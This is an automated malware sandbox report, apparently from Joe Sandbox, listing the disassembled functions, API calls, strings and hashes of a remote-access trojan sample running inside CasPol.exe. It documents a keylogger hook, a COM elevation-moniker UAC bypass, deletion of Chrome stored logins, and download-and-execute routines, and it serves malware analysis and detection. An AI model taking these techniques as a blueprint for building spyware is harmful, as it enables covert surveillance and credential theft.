Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797

Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00409B3F
GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
GetKeyboardLayout.USER32(00000000), ref: 00409B52
GetKeyState.USER32(00000010), ref: 00409B5C
GetKeyboardState.USER32(?), ref: 00409B67
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C

Strings

X[G, xrefs: 00409BFD

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID: X[G
API String ID: 1888522110-739899062
Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6

Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00406788
CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

Strings

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0040677D, 00406782, 004067C1
[+] ucmAllocateElevatedObject, xrefs: 0040676F
Elevation:Administrator!new:, xrefs: 004067A9
$, xrefs: 004067A2
[-] CoGetObject FAILURE, xrefs: 004067F1, 00406800
[+] CoGetObject, xrefs: 004067C8
[+] CoGetObject SUCCESS, xrefs: 004067F8

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D

Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
GetLastError.KERNEL32 ref: 00419945
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A

Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
GetLastError.KERNEL32 ref: 00409A1B

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
TranslateMessage.USER32(?), ref: 00409A7A
DispatchMessageA.USER32(?), ref: 00409A85

Strings

`#v, xrefs: 00409A01
Keylogger initialization failure: error , xrefs: 00409A32

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error $`#v
API String ID: 3219506041-3226811161
Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA

Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546

Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C

FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69

Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
GetProcAddress.KERNEL32(00000000), ref: 004131F4

Strings

SHDeleteKeyW, xrefs: 004131E3
Shlwapi.dll, xrefs: 004131E8

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB

Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
GetLastError.KERNEL32 ref: 0040B261

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040B287
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
UserProfile, xrefs: 0040B227
[Chrome StoredLogins not found], xrefs: 0040B27B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE

Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
GetLastError.KERNEL32 ref: 00416B02

Strings

SeShutdownPrivilege, xrefs: 00416AD7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5

Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004089AE

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C

Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811

__CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
String ID:
API String ID: 4043647387-0
Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98

Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5

Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Strings

>G, xrefs: 00418CA9
XCG, xrefs: 00418D59
@CG, xrefs: 00418D6F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: @CG$XCG$>G
API String ID: 341183262-3030817687
Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A

Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02

ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
GetProcAddress.KERNEL32(00000000), ref: 00415977

Strings

PowrProf.dll, xrefs: 0041596B
SetSuspendState, xrefs: 00415966

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F

Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA

Strings

OCP, xrefs: 00451247
ACP, xrefs: 00451211

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399

Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A

Strings

SETTINGS, xrefs: 0041A653

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59

Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D

Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
IsValidCodePage.KERNEL32(00000000), ref: 0045152E
IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69

Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407A91
FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99

Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
_free.LIBCMT ref: 00448077

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 00448243

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58

Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318

Strings

open, xrefs: 0040622E
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040627F, 004063A7

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
API String ID: 2825088817-4197237851
Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B

Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

x@G, xrefs: 00406AFD
x@G, xrefs: 00406BC0

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: x@G$x@G
API String ID: 4113138495-3390264752
Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B

Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C

Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714

Strings

WallpaperStyle, xrefs: 0041BBC7, 0041BBFA, 0041BC4A
